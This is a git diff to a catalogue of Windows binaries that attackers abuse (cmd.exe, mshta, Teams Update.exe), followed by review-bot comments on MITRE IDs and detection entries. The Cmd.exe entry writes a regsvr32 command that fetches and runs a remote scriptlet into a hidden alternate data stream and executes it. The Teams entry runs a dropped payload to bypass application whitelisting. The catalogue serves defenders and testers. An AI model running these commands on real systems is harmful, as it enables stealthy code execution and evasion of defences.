diff --git a/yml/OSBinaries/Cmd.exe.yml b/yml/OSBinaries/Cmd.exe.yml index 43b9565..1fc9f9f 100644 --- a/yml/OSBinaries/Cmd.exe.yml +++ b/yml/OSBinaries/Cmd.exe.yml @@ -1,19 +1,24 @@ +--- Name: Cmd.exe Description: The command-line interpreter in Windows Author: 'Ye Yint Min Thu Htut' Created: '2019-06-26' Commands: - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat - Description: To add content in an Alternate Data Stream (ADS). - - Command: cmd.exe - < fakefile.doc:payload.bat - Description: Execute payload.bat which is stored in an Alternate Data Stream (ADS). - + Description: Add content to an Alternate Data Stream (ADS). Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism Category: ADS Privileges: User - MitreID: T - MitreLink: https://attack.mitre.org/wiki/Technique/T + MitreID: T1170 + MitreLink: https://attack.mitre.org/wiki/Technique/T1170 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: cmd.exe - < fakefile.doc:payload.bat + Description: Execute payload.bat stored in an Alternate Data Stream (ADS). + Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism + Category: ADS + Privileges: User + MitreID: T1170 + MitreLink: https://attack.mitre.org/wiki/Technique/T1170 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - Path: C:\Windows\System32\cmd.exe diff --git a/yml/OSBinaries/Mshta.yml b/yml/OSBinaries/Mshta.yml index 13acc84..d5ef45f 100644 --- a/yml/OSBinaries/Mshta.yml +++ b/yml/OSBinaries/Mshta.yml 
@@ -35,7 +35,7 @@ Commands: Privileges: User MitreID: T1170 MitreLink: https://attack.mitre.org/wiki/Technique/T1170 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer) Full_Path: - Path: C:\Windows\System32\mshta.exe - Path: C:\Windows\SysWOW64\mshta.exe diff --git a/yml/OtherMSBinaries/Teams-update.yml b/yml/OtherMSBinaries/Teams-update.yml index 91464f8..91c46cc 100644 --- a/yml/OtherMSBinaries/Teams-update.yml +++ b/yml/OtherMSBinaries/Teams-update.yml 
@@ -1,25 +1,32 @@ --- Name: Update.exe Description: Update is the squirrel update utility used by Microsoft Electron app (Teams in this case) -Author: Mr.Un1k0d3r -Created: 2019-06-26 +Author: 'Mr.Un1k0d3r' +Created: '2019-06-26' Commands: - - Command: Copy your payload into `%userprofile%\AppData\Local\Microsoft\Teams\current\`. Then run the following command `%userprofile%\AppData\Local\Microsoft\Teams\Update.exe --processStart payload.exe --process-start-args "whatever args"` - Description: The Update.exe will execute the file you copied into the current folder. + - Command: Update.exe --processStart payload.exe --process-start-args "whatever args" + Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied. Usecase: Application Whitelisting Bypass Category: AWL Bypass - Privileges: user privs - MitreID: T1033 - MitreLink: https://attack.mitre.org/wiki/Technique/T1033 + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows 7 and up with Microsoft Teams installed + - Command: Update.exe --processStart payload.exe --process-start-args "whatever args" + Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied. 
+ Usecase: Execute binary + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed Full_Path: -- Path: %userprofile%\AppData\Local\Microsoft\Teams\Update.exe - + - Path: '%userprofile%\AppData\Local\Microsoft\Teams\Update.exe' Detection: -- IOC: Update.exe spawned an unknown process + - IOC: Update.exe spawned an unknown process Resources: - - Link: https://twitter.com/MrUn1k0d3r/status/1143928885211537408 - Acknowledgement: + - Link: https://twitter.com/MrUn1k0d3r/status/1143928885211537408 +Acknowledgement: - Person: Mr.Un1k0d3r - Handle: @MrUn1k0d3r + Handle: '@MrUn1k0d3r' ---
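Review bot: In the Cmd.exe.yml hunk, both new ADS entries are tagged `MitreID: T1170` / `MitreLink: .../T1170`, which is the same technique ID the Mshta.yml entry in this patch carries; please confirm that ID actually maps to the ADS/NTFS-attribute technique rather than to mshta, since the placeholder `MitreID: T` being replaced gives no hint. Two smaller points in the same hunk: `OperatingSystem: Windows vista, ...` should read `Windows Vista` for consistency with the other product names, and since the first command writes a `regsvr32.exe /s /u /i:<url> scrobj.dll` line into `fakefile.doc:payload.bat` and the second executes it via `cmd.exe - < fakefile.doc:payload.bat`, a Detection entry naming that stdin-redirect-from-an-ADS pattern would make the file more useful to defenders.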
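Review bot: In the Mshta.yml hunk, the caveat `(Does not work on 1903 and newer)` is appended to the `OperatingSystem` value of only the one command entry touched at line 35; if the limitation applies to the mshta technique as a whole it should be stated on every command entry in the file (or in the Description), and if it is specific to this entry, a short note on what fails on 1903+ would help readers decide whether the detection still matters on current builds. Embedding a parenthetical in the comma-separated OS list also breaks the pattern every other entry in this patch follows.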
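Review bot: In the Teams-update.yml hunk, the Detection IOC `Update.exe spawned an unknown process` is too vague to turn into a rule; the hunk itself names the parent path `%userprofile%\AppData\Local\Microsoft\Teams\Update.exe` and the child location `...\Teams\current\`, so the IOC should say something like `Update.exe at that path spawning a child from Teams\current\ with --processStart on the command line`, which is what the corrected Command line now exposes. Also note that the two new command entries are byte-for-byte identical in `Command` and `Description` and differ only in `Usecase`/`Category` (`AWL Bypass` vs `Execute`); if that duplication is the repo convention for multi-category entries, fine, otherwise one entry with both categories would be cleaner. The change of `MitreID: T1033` to `T1218` and `Privileges: user privs` to `User` looks right.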